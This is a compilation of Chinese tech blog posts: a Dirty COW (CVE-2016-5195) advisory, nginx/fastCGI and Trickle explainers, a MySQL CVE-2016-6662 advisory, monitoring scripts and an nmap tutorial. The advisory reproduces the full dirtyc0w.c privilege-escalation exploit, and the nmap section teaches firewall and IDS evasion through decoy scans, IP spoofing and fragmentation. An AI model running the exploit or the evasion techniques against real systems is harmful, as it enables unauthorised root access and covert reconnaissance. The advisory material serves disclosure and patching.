漏洞描述

漏洞编号：CVE-2016-5195

漏洞名称：脏牛（Dirty COW）

漏洞危害：低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权

影响范围：Linux内核>=2.6.22（2007年发行）开始就受影响了，直到2016年10月18日才修复。

为什么这个漏洞叫脏牛（Dirty COW）漏洞？

Linux内核的内存子系统在处理写时拷贝（Copy-on-Write)时存在条件竞争漏洞，导致可以破坏私有只读内存映射。一个低权限的本地用户能够利用此漏洞获取其他只读内存映射的写权限，有可能进一步导致提权漏洞。

漏洞相关细节​

漏洞细节：https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
根据RedHat公司的报告称：目前已经在野外发现针对这个漏洞的利用技术。但是到目前为止，我们没有更进一步的消息。    https://access.redhat.com/security/vulnerabilities/2706661

Commit messages：

commit 4ceb5db9757aaeadcf8fbbf97d76bd42aa4df0d6

Author: Linus Torvalds 

Date:   Mon Aug 1 11:14:49 2005 -0700

修复get_user_pages()写访问竞争条件:
如果一个更新来自其他线程结束修改页表，handle_mm_fault()将可能结束需要我们重新操作。handle_mm_fault()没有真正的防护一直能够破坏COW。这样看起来是不错的，但是get_user_pages()结束后会重新读，使get_user_pages()一直重写的话，需要dirty bit 设置，最简单的解决竞争条件的办法是，如果COW的break因为某些原因失败，我们能够继续循环继续尝试。

commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619

Author: Linus Torvalds 

Date:   Thu Oct 13 20:07:36 2016 GMT

这是一个年代久远的BUG了，我在7年前已经曾经尝试修复过一次了（commit 4ceb5db9757a），但是由于一些问题（commit f33ea7f404e5）又回滚了。这次，我们对pte_dirty()位做了检测。

Linux各发行版本对于该漏洞相关信息

Red Hat：https://access.redhat.com/security/cve/cve-2016-5195 
Debian ：https://security-tracker.debian.org/tracker/CVE-2016-5195 
Ubuntu ：http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html

受影响的范围

这个漏洞自从内核2.6.22（2007年发行）开始就受影响了，直到2016年10月18日才修复。

如何修改该漏洞

Linux团队正在积极的修复此漏洞，可以通过系统更新到最新发行版修复此漏洞。软件开发人员也可以通过
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/？id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 重新编译Linux修复此漏洞。

如何发现有人利用该漏洞攻击我？

利用这个Bug不会在日志里留下异常信息。但是部分安全社区已经部署蜜罐，如果有攻击者利用此漏洞，将会触发告警。

谁发现的这个漏洞？

Phil Oester （https://access.redhat.com/security/cve/CVE-2016-5195 ）
对于该漏洞作者甚至申请了独立的：网站、twitter帐号、github帐号、并找专人设计了Logo
作者对此的解释是：我们对建立有品牌的漏洞充满了乐趣，但是也许在这个时间点，这不是一个好主意。但是为了表明我们的立场，我才创建了网站，在线商店，twiiter帐号，以及请专业设计师为这个漏洞设计了LOGO。
 
2016.10.21 9:10更新POC：
POC地址：https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c

/*

####################### dirtyc0w.c #######################

$ sudo -s

# echo this is not a test > foo

# chmod 0404 foo

$ ls -lah foo

-r-----r-- 1 root root 19 Oct 20 15:23 foo

$ cat foo

this is not a test

$ gcc -lpthread dirtyc0w.c -o dirtyc0w

$ ./dirtyc0w foo m00000000000000000

mmap 56123000

madvise 0

procselfmem 1800000000

$ cat foo

m00000000000000000

####################### dirtyc0w.c #######################

*/

#include 

#include 

#include 

#include 

#include 

  

void *map;

int f;

struct stat st;

char *name;

  

void *madviseThread(void *arg)

{

  char *str;

  str=(char*)arg;

  int i,c=0;

  for(i=0;i<100000000;i++)

  {

/*

You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661

> This is achieved by racing the madvise(MADV_DONTNEED) system call

> while having the page of the executable mmapped in memory.

*/

    c+=madvise(map,100,MADV_DONTNEED);

  }

  printf("madvise %d\n\n",c);

}

  

void *procselfmemThread(void *arg)

{

  char *str;

  str=(char*)arg;

/*

You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16

>  The in the wild exploit we are aware of doesn't work on Red Hat

>  Enterprise Linux 5 and 6 out of the box because on one side of

>  the race it writes to /proc/self/mem, but /proc/self/mem is not

>  writable on Red Hat Enterprise Linux 5 and 6.

*/

  int f=open("/proc/self/mem",O_RDWR);

  int i,c=0;

  for(i=0;i<100000000;i++) {

/*

You have to reset the file pointer to the memory position.

*/

    lseek(f,map,SEEK_SET);

    c+=write(f,str,strlen(str));

  }

  printf("procselfmem %d\n\n", c);

}

  

  

int main(int argc,char *argv)

{

/*

You have to pass two arguments. File and Contents.

*/

  if (argc<3)return 1;

  pthread_t pth1,pth2;

/*

You have to open the file in read only mode.

*/

  f=open(argv[1],O_RDONLY);

  fstat(f,&st);

  name=argv[1];

/*

You have to use MAP_PRIVATE for copy-on-write mapping.

> Create a private copy-on-write mapping.  Updates to the

> mapping are not visible to other processes mapping the same

> file, and are not carried through to the underlying file.  It

> is unspecified whether changes made to the file after the

> mmap() call are visible in the mapped region.

*/

/*

You have to open with PROT_READ.

*/

  map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);

  printf("mmap %x\n\n",map);

/*

You have to do it on two threads.

*/

  pthread_create(&pth1,NULL,madviseThread,argv[1]);

  pthread_create(&pth2,NULL,procselfmemThread,argv[2]);

/*

You have to wait for the threads to finish.

*/

  pthread_join(pth1,NULL);

  pthread_join(pth2,NULL);

  return 0;

}

转载：安全客 ， 参考：https://www.grahamcluley.com/dirty-cow-linux-vulnerability-need-know/

背景介绍

在Linux下搭建Nginx+Mysql+PHP(LPMN)的时候，nginx.conf中配需要配置fastCGI，php需要安装php-fpm扩展并启动php-fpm守护进程，nginx才可以解析php脚本。那么，这样配置的背后原理是什么？nginx、fastCGI、php-fpm之间又有什么关系呢？一直有这样的疑惑，由于无法理清nginx、php-fpm之间的关系，遇到nginx解析不了php脚本的时候，往往不知所措，花费的问题排查时间也非常长。因此，特地抽时间了解这背后的原理，梳理了一下nginx、fastCGI、php-fpm之间的关系。

什么是fastCGI

fastCGI是由CGI（common gateway interface，通用网关接口）发展而来，是http服务器（nginx、apache）和动态脚本语言（php）之间的通信接口。记住，fastCGI只是一个接口。
 
传统CGI接口方式的主要缺点是性能很差，因为每次HTTP服务器遇到动态程序时都需要重新启动脚本解析器来执行解析，然后结果被返回给HTTP服务器。这在处理高并发访问时，几乎是不可用的。另外传统的CGI接口方式安全性也很差，现在已经很少被使用了。
 
FastCGI接口方式采用C/S结构，可以将HTTP服务器和脚本解析服务器分开，同时在脚本解析服务器上启动一个或者多个脚本解析守护进程。当HTTP服务器每次遇到动态程序时，可以将其直接交付给FastCGI进程来执行，然后将得到的结果返回给浏览器。这种方式可以让HTTP服务器专一地处理静态请求或者将动态脚本服务器的结果返回给客户端，这在很大程度上提高了整个应用系统的性能。
 

Nginx+FastCGI运行原理

Nginx不支持对外部程序的直接调用或者解析，所有的外部程序（包括PHP）必须通过FastCGI接口来调用。FastCGI接口在Linux下是socket，（这个socket可以是文件socket，也可以是ip socket）。为了调用CGI程序，还需要一个FastCGI的wrapper（wrapper可以理解为用于启动另一个程序的程序），这个wrapper绑定在某个固定socket上，如端口或者文件socket。当Nginx将CGI请求发送给这个socket的时候，通过FastCGI接口，wrapper接纳到请求，然后派生出一个新的线程，这个线程调用解释器或者外部程序处理脚本并读取返回数据；接着，wrapper再将返回的数据通过FastCGI接口，沿着固定的socket传递给Nginx；最后，Nginx将返回的数据发送给客户端，这就是Nginx+FastCGI的整个运作过程。详细的过程，如图1所示。

 

spawn-fcgi与PHP-FPM

前面介绍过，FastCGI接口方式在脚本解析服务器上启动一个或者多个守护进程对动态脚本进行解析，这些进程就是FastCGI进程管理器，或者称之为FastCGI引擎， spawn-fcgi与PHP-FPM就是支持PHP的两个FastCGI进程管理器。
 
下面简单介绍spawn-fcgi与PHP-FPM的异同。
spawn-fcgi是HTTP服务器lighttpd的一部分，目前已经独立成为一个项目，一般与lighttpd配合使用来支持PHP，但是ligttpd的spwan-fcgi在高并发访问的时候，会出现内存泄漏甚至自动重启FastCGI的问题。
 
Nginx是个轻量级的HTTP server，必须借助第三方的FastCGI处理器才可以对PHP进行解析，因此Nginx+spawn-fcgi的组合也可以实现对PHP的解析，这里不过多讲述。

PHP-FPM也是一个第三方的FastCGI进程管理器，它是作为PHP的一个补丁来开发的，在安装的时候也需要和PHP源码一起编译，也就是说PHP-FPM被编译到PHP内核中，因此在处理性能方面更加优秀；同时它在处理高并发方面也比spawn-fcgi引擎好很多，因此，推荐Nginx+PHP/PHP-FPM这个组合对PHP进行解析。

FastCGI 的主要优点是把动态语言和HTTP Server分离开来，所以Nginx与PHP/PHP-FPM经常被部署在不同的服务器上，以分担前端Nginx服务器的压力，使Nginx专一处理静态请求和转发动态请求，而PHP/PHP-FPM服务器专一解析PHP动态请求。
具体更多详解参考：http://ixdba.blog.51cto.com/2895551/806622

有时候我们经常会遇到某个应用程序占满了整个系统的带宽，然后影响到了其他程序的运行效率。这个时候其实是可以限制这个程序的带宽占用的，然后达到带宽均衡被瓜分。这个时候Trickle就可以做到，他可以控制应用程序的上下行带宽，达到带宽不至于被一个程序霸占。

什么是 Trickle

rickle是一个网络带宽调整工具，可以让我们管理应用程序的网络上下行速度，使得可以避免其中的某个应用程序霸占了全部或大部分可用的带宽。换句话说，Trickle可以让你基于单个应用程序来控制网络流量速率，而不是仅仅针对与单个用户——这是在客户端网络环境中经典的带宽调整情况。 

Trickle 可以限制 Linux 命令行工具的上传和下载流量。在跨地域文件传输或者备份时非常有用，因为外网带宽往往会比较贵。

或者你想备份进程或者下载进程不对同机器的其他服务产生影响，也需要 Trickle 这样的限流工具。

再或者你在办公室想下载大文件，不希望影响其他网络用户或者应用，Trickle 就是为此设计。

Trickle 如何工作

trickle 可以帮助我们基于应用来定义优先级，所以当对整个系统进行了全局限制设定，高优先级的应用依然会自动地获取更多的带宽。为了实现这个目标，trickle 对 TCP 连接上的套接字的数据发送、接收设置流量限制。我们必须注意到，除了影响传输速率之外，在这个过程中，trickle任何时候都不会以任何方式来改变其中的数据。 

Trickle不能做什么

trickle唯一的限制就是不支持静态链接的应用程序或者具有SUID或SGID位设置的二进制程序，因为它使用动态链接的方式将其载入到需要调整的进程和其关联的网络套接字之间。 Trickle此时会在这两种软件组件之间扮演代理的角色。

由于trickle并不需要超级用户的权限来运行，所以用户可以设置他们自己的流量限制。可能这并不是你想要的，我们会探索如何使用全局设定来限制系统中的所有用户的流量限制。也即是说，此时系统中的每个用户具有管理各自的流量速率，但是无论如何，都会受到系统管理员给他们设置的总体限制。

在这篇文章中，我们会描述如何通过trickle在linux平台上管理应用程序使用的网络带宽。为了生成所需的流量，在此会在客户端(CentOS 7 server – dev1: 192.168.0.17)上使用 ncftpput 和 ncftpget， 在服务器(Debian Wheezy 7.5 – dev2: 192.168.0.15)上使用vsftpd 来进行演示。 相同的指令也可以在RedHat，Fedora和Ubuntu等系统使用。 

使用案例

前提条件

对于 RHEL/CentOS 7/6， 开启EPEL仓库。这些用于企业版 Linux 的额外软件包是一个由Fedora项目维护的高质量、开源的软件仓库，而且百分之百与其衍生产品相兼容，如企业版本Linux和CentOS。 在这个仓库中trickle和ncftp两者都是可用的。

按照如下方式安装ncftp：

# yum update && sudo yum install ncftp [基于 RedHat 的系统]

# aptitude update && aptitude install ncftp [基于 Debian 的系统]

在单独的服务器上设置一个FTP服务器。需要注意的是，尽管FTP天生就不安全，但是仍然被广泛应用在安全性无关紧要的文件上传下载中。 在这篇文章中我们使用它来演示trickle的优点，同时它也会在客户端的标准输出流中显示传输速率。我们将是否在其它时间使用它放在一边讨论。
 
现在，在FTP服务器上按照以下方式编辑 /etc/vsftpd/vsftpd.conf 文件。

anonymous_enable=NO

local_enable=YES

chroot_local_user=YES

allow_writeable_chroot=YES

在此之后，确保在你的当前会话中启动了vsftpd，并在之后的启动中让其自动启动。

# systemctl start vsftpd [基于 systemd 的系统]

# systemctl enable vsftpd

# service vsftpd start [基于 init 的系统]

# chkconfig vsftpd on

如果你选择在一个使用 SSH 密钥进行远程访问的 CentOS/RHEL 7中搭建FTP服务器，你需要一个密码受保护的用户账户，它能访问root目录之外的某个目录，并有能在其中上传和下载文件的权限。
 
你可以通过在你的浏览器中输入以下的URL来浏览你的家目录。一个登录窗口会弹出来提示你输入FTP服务器中的有效的用户名和密码。

ftp://192.168.0.15

如果验证成功，你就会看到你的家目录中的内容。该教程的稍后部分中，你将可以刷新页面来显示在你之前上传过的文件。

 
使用方法：
只需要把 trickle 和相关参数附加在其他 Linux 命令行工具命令之前即可。

比如限制 Wget 下载文件的速度为 20KB/S

trickle -s -d 20 wget -c http://blog.eood.cn/

限制文件备份到 AWS S3 的上传速度为 1MB/S：

trickle -s -u 1024 s3cmd sync /mnt/data/ s3://my-backup

当然，你也可以把 trickle 加在现有的服务器自动化脚本中完成限流功能。
 其他功能：
trickle -L 设置延迟为多少 ms
trickle -w 设置窗口长度为多少 KB

假如你使用 Linux 系统作为办公和开发环境。Trickle 还可以针对每个不同的 Linux 工具进行限流，这样你可以限制 BT 下载的速度，而不影响浏览网页。

MySQL最近爆出高危漏洞CVE-2016-6662，可导致远程代码执行/权限提升。
 
影响范围：

MySQL <= 5.7.15，

      <=5.6.33，

      <= 5.5.52

PerconaDB与MariaDB也受此漏洞影响。

修复方案：
1.oracle官网发布mysql修复补丁后立即升级版本。PerconaDB与MariaDB官网已经发布补丁，请升级到最新版本。下载地址分别如下：
https://mariadb.org/download/ 
https://www.percona.com/downloads/ 

2.暂时的缓解策略：
修改MySQL所有用户密码为复杂密码；
关闭MySQL普通用户的File文件访问权限；
以root用户身份创建一个虚假my.cnf文件；
 
 
漏洞详情：
攻击者通过一个拥有File权限的MySQL普通用户将恶意库文件路径插入到MySQL配置文件的malloc_lib变量中，当MySQL服务重启时就可以加载恶意库文件实现以root权限执行任意代码。
 
漏洞利用条件：

1. 攻击者可以在配置文件中注入恶意配置；
2. 上传恶意的so到lib库中；
3. db重启（重新加载恶意配置）。

 
 
验证方法参考：http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html

wget -c http://nodejs.org/dist/v0.12.4/node-v0.12.4.tar.gz

tar zxf node-v0.12.4.tar.gz

cd node-v0.12.4

./configure && make && make install

sleep 1



npm config set registry http://registry.cnpmjs.org

npm install yslow -g

接着讲上节的内容，上节中提到了一个时间优化的问题是使用参数-n,通过不解析地址来进行优化时间的，但是优化时间的方法还有很多，比如说我们可以通过时间优化(0-5)，指定单位时间内的探针数，设置组的大小。
 

时间优化

时间优化的参数是(-T0~5)，最快的扫描速度为-T5,最慢的扫描速度为-T0,实现的原理：通过设置各个端口的扫描周期，从而来控制整个扫描的时间，比如说T0各个端口的扫描周期大约为5分钟，而T5各个端口的扫描周期为5ms，但是过快的扫描也是有缺点的，扫描的周期过快，会很容易被防火墙和IDS发现并记录，因为防火墙大多数会将端口周期过段识别为扫描从而屏蔽掉，如果不对其进行设置的话，默认值为T4

--min-hostgroup/--max-hostgroup size    设置组的大小

--min-parallelism/--max-parellelism time  指定时间内的探针数

在上节中还讲漏了一个知识点获取指定端口的参数（-p），这个参数的意义在于对于我们有时候只想监控某个特定的端口的状态，这个参数是即为有用的，可以节约了不少的时间
例如：监控nmap.org的80端口的状态，命令：

nmap -p 80 baidu.com

 

怎样规避被防火墙或IDS发现的风险以及操作的步骤​

上节中我们假设的是在一个网络安全较为薄弱的情况下就可以正常进行的，但是正常的网站或者个人都是对安全有一定的防范的，网站中基本上都会存在安全狗、防火墙等规避风险的措施，个人电脑也会安装各种安全软件，所以对于做扫描工作的人来说，我们不知道通过扫描获取相关的信息，同时也要保护好自己的隐私，比如IP等信息，防止被防火墙或者是网络日志所记录下来
在讲这节之前我们来了解一下什么是防火墙？
防火墙的原理图如下:

防火墙是通过在客户端与服务器端之间搭建一个监控（运行的原理有点像Fiddler），通过对特定开放的端口进行屏蔽掉，从而达到网络安全的作用，防火墙在其功能上也会有一些其他的功能，这个要看防火墙的实际情况。
 
 规避的基本思路：

1. 通过伪造访问的IP地址
2. 通过对发送信息进行处理
3. 将风险进行嫁接
4. 其他的技术

 
 
伪造IP地址
伪造IP地址有很多种方法，可以通过下面的这几种方法是我认为比较常见让大家了解。
 
一、诱饵扫描(-D)
诱饵扫描的工作原理是：通过伪造大量的IP与自己真实的IP一起访问网站，从而混淆管理员的判断，其中问你们使用ME来代表自己的真实地址
 
例子：虚构一个IP为203.88.163.34与自己的真实地址去扫描baidu.com

命令：sudo nmap -F -D 203.88.163.34,ME baidu.com
结果如下：

Starting Nmap 7.00 ( https://nmap.org ) at 2016-09-20 20:07 CST

Nmap scan report for baidu.com (123.125.114.144)

Host is up (0.10s latency).

Other addresses for baidu.com (not scanned): 220.181.57.217 180.149.132.47 111.13.101.208

Not shown: 98 filtered ports

PORT    STATE SERVICE

80/tcp  open  http

443/tcp open  https



Nmap done: 1 IP address (1 host up) scanned in 3.59 seconds

但是在使用伪造的IP的同时，我们要注意要对伪造的IP进行主机发现，来判断主机是否存在，是否开启，因为有些防火墙策略是有这样规定的：如果访问的IP主机是关闭或者是为空的话，就讲所有的返回内容过滤掉。试想一下，如果主机关闭或者是不存在，那么怎么可能会发送扫描的命令给目标主机呢？

要找到开启的目标主机理论上是没有什么要求的，但是为了节约时间，我建议是直接使用某个网站的IP地址，这样有如下几个好处：

1. IP地址容易获得，一般的网站是通过ping参数就可以直接获取该网站的IP地址，除了一些不让进行Ping操作的网站除外
2. 容易保证IP的正常开启，因为谁家的网站会经常关闭服务器，服务器一般是总是开启的

 
二、源地址欺骗(-S)
源地址欺骗的原理是：通过将自己的IP伪装成为其他的IP去扫描目标主机从而骗过目标主机的追踪

假设要伪装成为1.1.1.1：参数-S 1.1.1.1 使用1.1.1.1进行扫描，让防火墙误以为是来自1.1.1.1的扫描行为

在使用的时候要注意与-e进行使用，因为除了制定要伪装成为的对象IP外，还要指定返回的IP地址
 
三、时间优化（-T）
通过时间优化也提高通过防火墙和IDS的通过率
 
发送信息处理
指定使用分片(-f)
分片的工作原理是：将可疑的探测包进行分片处理（例如将TCP包拆分成多个IP包发送过去），某些简单的防火墙为了加快处理速度可能不会进行重组检查，以此避开其检查。
 
将风险责任进行嫁接
空闲扫描（-sI）：
这里有一篇比较全面的文章http://www.2cto.com/Article/201505/396631.html  在这就不多做介绍
 
其他的相关技术：
有MAC伪造技术等
 
 
防火墙/IDS躲避和哄骗

Memcached：

#!/usr/bin/env python

#coding=utf8

 

import sys

import os

 

class GetMemStatus():

    def __init__(self):

        self.val = {}

    def check(self):

        try:

            import memcache

            self.mc = memcache.Client(['127.0.0.1:11211'], debug=0)

        except:

            raise Exception, 'Plugin needs the memcache module'

 

    def extract(self, key):

        stats = self.mc.get_stats()

        try:

            if key in stats[0][1]:

                self.val[key] = stats[0][1][key]

            return self.val[key]

        except:

            raise Exception, 'ERROR: key is not in stats!!!'

 

def main():

    if len(sys.argv) == 1:

        print "ERROR! Please enter a key"

    elif len(sys.argv) == 2:

        key = sys.argv[1]

        a = GetMemStatus()

        a.check()

        print a.extract(key)

 

if __name__ == "__main__":

    main()

Redis：

#!/usr/bin/env python

#coding=utf8



import sys

import os



class GetRedisStatus():

    def __init__(self):

        self.val = {}

    def check(self):

        try:

            import redis

            self.redis = redis.Redis('127.0.0.1', port=6379, password=None)

        except:

            raise Exception, 'Plugin needs the redis module'



    def extract(self, key):

        info = self.redis.info()

        try:

            if key in info:

                self.val[key] = info[key]

            return self.val[key]

        except:

            raise Exception, 'ERROR info not include this key!'



def main():

    if len(sys.argv) == 1:

        print "ERROR! Please enter a key"

    elif len(sys.argv) == 2:

        key = sys.argv[1]

        a = GetRedisStatus()

        a.check()

        print a.extract(key)



if __name__ == "__main__":

    main()

什么是端口扫描

端口扫描是指某些别有用心的人发送一组端口扫描消息，试图以此侵入某台计算机，并了解其提供的计算机网络服务类型(这些网络服务均与端口号相关)，但是端口扫描不但可以为黑客所利用，同时端口扫描还是网络安全工作者的必备的利器，通过对端口的扫描，了解网站中出现的漏洞以及端口的开放情况，对网站安全方面有着不可或缺的贡献，是网络安全中的基础认知。
 
目前在市面上主要的端口扫描工具是X_Scan、SuperScan、nmap，其中在这里主推的是nmap，因为nmap具有以下的这一些优点：

1. 多种多样的参数，丰富的脚本库，满足用户的个人定制需求，其中脚本库还提供了很多强大的功能任你选择
2. 强大的可移植性，基本上能在所有的主流系统上运行，而且代码是开源的
3. 详细的文档说明，和强大的社区团队进行支持，方便新人上手

 
Nmap是一款开源免费的网络发现（Network Discovery）和安全审计（Security Auditing）工具，但是nmap也是有一些缺点的，比如说上手较难，但是难上手是相对的，与其他达到这种功能性的软件产品相比，还是比较容易上手的，但是这也不妨碍nmap成为世界千万安全专家列为必备的工具之一，在其中的一些影视作品中《黑客帝国2》、《特警判官》中都有亮相。

Nmap功能介绍

Centos Install:

# yum -y install nmap

Ubuntu Install:

# apt-get install nmap -y

Nmap包含四项基本功能：

1. 主机发现（Host Discovery）
2. 端口扫描（Port Scanning）
3. 版本侦测（Version Detection）
4. 操作系统侦测（Operating System Detection）

 
下面我们介绍一下主机发现，主机发现顾名思义就是发现所要扫描的主机是否是正在运行的状态，接下来就来一个简单例子：获取http://baidu.com 的主机是否开启， 命令：nmap -F -sT -v baidu.com

• -F：扫描100个最有可能开放的端口  
•  -v 获取扫描的信息   
• -sT：采用的是TCP扫描 不写也是可以的，默认采用的就是TCP扫描

 运行结果如下： 如上图所示1，我们可以发现对URL进行解析花了0.01秒，如果是国外网站这个地方花费的时间较多，可以进行优化的，优化的方法会稍后介绍图中所示2，是总共的运行时间图中的3是说明有98个端口被屏蔽了，也就是说明了网站的防火墙是开启的，因为没有开启防火墙是不会对端口进行屏蔽的。 端口的状态，一般有如下几种： 图中的4是本次返回的关键信息，其中我们要主要关注的是端口号，端口状态，端口上的服务。 那你可能就会要问为什么要关注这些端口呢？那这个问题就要转到探讨为什么要进行扫描？扫描对于黑客和安全人员来说，大致流程都是如下所示： 从这个图中我们不难发现，我们主要关注的区域就是这些内容，接下来就来讨论下，上面提出来的问题？怎样对URL解析的时间进行优化，在Nmap重提供了不进行解析的参数(-n),这样就不会对域名进行解析了其中关于域名解析的相关参数还有：

• -R 为所有的目标主机进行解析
• --system-dns 使用系统域名解析器进行解析，这个解析起来会比较慢
• --dns-server 服务器选择DNS解析

说到-R注释的意思你会有所体会，其实nmap的扫描解析不止是对一个目标主机进行解析，还可以对一定范围内的目标主机群进行解析 例如：查找180.149.132.151-152的主机的状态以及端口状态,分析如下：1、虽然查找的主机的数量不多，但是这样查找起来也是很浪费时间的， 所有我们可以通过使用快速查找的方法来节约时间快速查找端口方法的原理如下：默认的情况下，我们的查找是查找最有可能开放的1000端口，但是使用快速端口查找(参数 -F )会查找最有可能开放的100个端口，这样也就节约了10倍的时间 2、这里我们需要获取端口的状态，所以就不能使用参数(-sn)，这个参数是可以跳过端口扫描，直接进行主机发现的输入命令：nmap -F -sT -v -n 180.149.132.151-152     180.149.132.151:baidu.com的IP地址PS:1、-sn参数只能扫描的主机，不能扫描端口，另一个参数也要特别注意的是（-PE）通过ICMP echo判定主机是否存活运行情况如下： 图片中的1处指的是，采用sT的扫描方法，这种扫描方法准确，速度快，但是这样的扫描容易被防火墙和IDS发现并记录，所以这种方法，实际中并不多用由图中的3处我们可以知道在不进行解析的情况下扫描用时为4.53秒，比解析的时候用的时间节约了不少图中的4说明了扫描了2个主机  提示：在nmap运行的时候，如果我们可以像其他编程一样打“断点”，直接按键盘的d键就行了，如果想知道运行的进度可以按下X键

扫描方法

好了，示例也讲完了，下面我们就来分析一下扫描的各种方法：一、端口扫描1、TCP扫描（-sT）这是一种最为普通的扫描方法，这种扫描方法的特点是：扫描的速度快，准确性高，对操作者没有权限上的要求，但是容易被防火墙和IDS(防入侵系统)发现运行的原理：通过建立TCP的三次握手连接来进行信息的传递   2、SYN扫描（-sS）这是一种秘密的扫描方式之一，因为在SYN扫描中Client端和Server端没有形成3次握手，所以没有建立一个正常的TCP连接，因此不被防火墙和日志所记录，一般不会再目标主机上留下任何的痕迹，但是这种扫描是需要root权限（对于windows用户来说，是没有root权限这个概念的，root权限是linux的最高权限，对应windows的管理员权限） 运行的原理图如下：  3、NULL扫描NULL扫描是一种反向的扫描方法，通过发送一个没有任何标志位的数据包给服务器，然后等待服务器的返回内容。这种扫描的方法比前面提及的扫描方法要隐蔽很多，但是这种方法的准确度也是较低的， 主要的用途是用来判断操作系统是否为windows，因为windows不遵守RFC 793标准，不论端口是开启还是关闭的都返回RST包 但是虽然NULL具有这样的一些用处，但是本人却认为不宜使用NULL[list=1]

NULL方法的精确度不高，端口的状态返回的不是很准确

要获取目标主机的运行系统，可以使用参数(-O),来获取对于一些操作系统无法准确判断的，可以加上参数(-osscan-guess)

NULL扫描易被过滤

 4、FIN扫描FIN扫描的原理与NULL扫描的原理基本上是一样的在这里就不重复了5、ACK扫描ACK扫描的原理是发送一个ACK包给目标主机，不论目标主机的端口是否开启，都会返回相应的RST包，通过判断RST包中的TTL来判断端口是否开启运行原理图： TTL值小于64端口开启，大于64端口关闭大致上主要的扫描方法就是这些，除了我们可以按照这样些参数去执行扫描外，还可以自己定义一个TCP扫描包 6、自定义TCP扫描包的参数为（--scanflags）例如：定制一个包含ACK扫描和SYN扫描的安装包命令：nmap --scanflags ACKSYN baidu.com

Starting Nmap 7.00 ( https://nmap.org ) at 2016-09-19 23:57 CSTNmap scan report for baidu.com (220.181.57.217)Host is up (0.010s latency).Other addresses for baidu.com (not scanned): 180.149.132.47 123.125.114.144 111.13.101.208Not shown: 998 filtered portsPORT    STATE SERVICE80/tcp  open  http443/tcp open  httpsNmap done: 1 IP address (1 host up) scanned in 5.41 seconds

接下来还有各种扫描方法的端口列表参数:

• -PS 端口列表用,隔开[tcp80 syn 扫描]
• -PA 端口列表用,隔开[ack扫描](PS+PA测试状态包过滤防火墙【非状态的PA可以过】)【默认扫描端口1-1024】
• -PU 端口列表用,隔开[udp高端口扫描 穿越只过滤tcp的防火墙]

 
其他的常见命令
输出命令
-oN 文件名 输出普通文件
-oX 文件名 输出xml文件

错误调试：
--log-errors 输出错误日志
--packet-trace 获取从当前主机到目标主机的所有节点
更多参数参考：http://www.2cto.com/Article/201203/125686.html
文章参考：http://www.myhack58.com/Article/60/76/2015/67856.htm?utm_source=tuicool&utm_medium=referral

Linux 系统在早期的时候被人们嘲笑，它什么也干不了。而现在，Linux 无处不在！

我当时还是个在巴西学习计算机工程的大三学生，并同时在一个全球审计和顾问公司兼职系统管理员。公司决定用 Oracle 数据库开发一些企业资源计划（ERP）软件。因此，我得以在 Digital UNIX OS (DEC Alpha) 进行训练，这个训练颠覆了我的三观。

UNIX 系统非常的强大，而且给予了我们对机器上包括存储系统、网络、应用和其他一切的绝对控制权。

我开始在 ksh 和 Bash 里编写大量的脚本让系统进行自动备份、文件传输、提取转换加载（ETL）操作、自动化 DBA 日常工作，还为各种不同的项目创建了许多服务。此外，调整数据库和操作系统的工作让我更好的理解了如何让服务器以最佳方式运行。在那时，我在自己的个人电脑上使用的是 Windows 95 系统，而我非常想要在我的个人电脑里放进一个 Digital UNIX，或者哪怕是 Solaris 或 HP-UX 也行，但是那些 UNIX 系统都得在特定的硬件才能上运行。我阅读了所有的系统文档，还找过其它的书籍以求获得更多的信息，也在我们的开发环境里对这些疯狂的想法进行了实验。

后来在大学里，我从我的同事那听说了 Linux。我那时非常激动的从还在用拨号方式连接的因特网上下载了它。在我的正宗的个人电脑里装上 UNIX 这类系统的这个想法真是太酷了！

Linux 不同于 UNIX 系统，它设计用来在各种常见个人电脑硬件上运行，在起初，让它开始工作确实有点困难，Linux 针对的用户群只有系统管理员和极客们。我为了让它能运行，甚至用 C 语言修改了驱动软件。我之前使用 UNIX 的经历让我在编译 Linux 内核，排错这些过程中非常的顺手。由于它不同于那些只适合特定硬件配置的封闭系统，所以让 Linux 跟各种意料之外的硬件配置一起工作真的是件非常具有挑战性的事。

我曾见过 Linux 在数据中心获得一席之地。一些具有冒险精神的系统管理员使用它来帮他们完成每天监视和管理基础设施的工作，随后，Linux 作为 DNS 和 DHCP 服务器、打印管理和文件服务器等赢得了更多的使用。企业曾对 Linux 有着很多顾虑（恐惧，不确定性，怀疑(FUD:fear, uncertainty and doubt)）和诟病：谁是它的拥有者？由谁来支持它？有适用于它的应用吗？

但现在看来，Linux 在各个地方进行着逆袭！从开发者的个人电脑到大企业的服务器；我们能在智能手机、智能手表以及像树莓派这样的物联网（IoT）设备里找到它。甚至 Mac OS X 有些命令跟我们所熟悉的命令一样。微软在制造它自己的发行版，在 Azure 上运行，然后…… Windows 10 要装备 Bash。

有趣的是 IT 市场会不断地创造并迅速的用新技术替代，但是我们所掌握的 Digital UNIX、HP-UX 和 Solaris 这些旧系统的知识还依然有效并跟 Linux 息息相关，不论是为了工作还是玩。现在我们能完全的掌控我们的系统，并使它发挥最大的效用。此外，Linux 有个充满热情的社区。

我真的建议想在计算机方面发展的年轻人学习 Linux，不论你处于 IT 界里的哪个分支。如果你深入了解了一个普通的家用个人电脑是如何工作的，你就可以以基本相同的方式来面对任何机器。你可以通过 Linux 学习最基本的计算机知识，并通过它建立能在 IT 界任何地方都有用的能力！

翻译原文：https://opensource.com/life/16/8/revenge-linux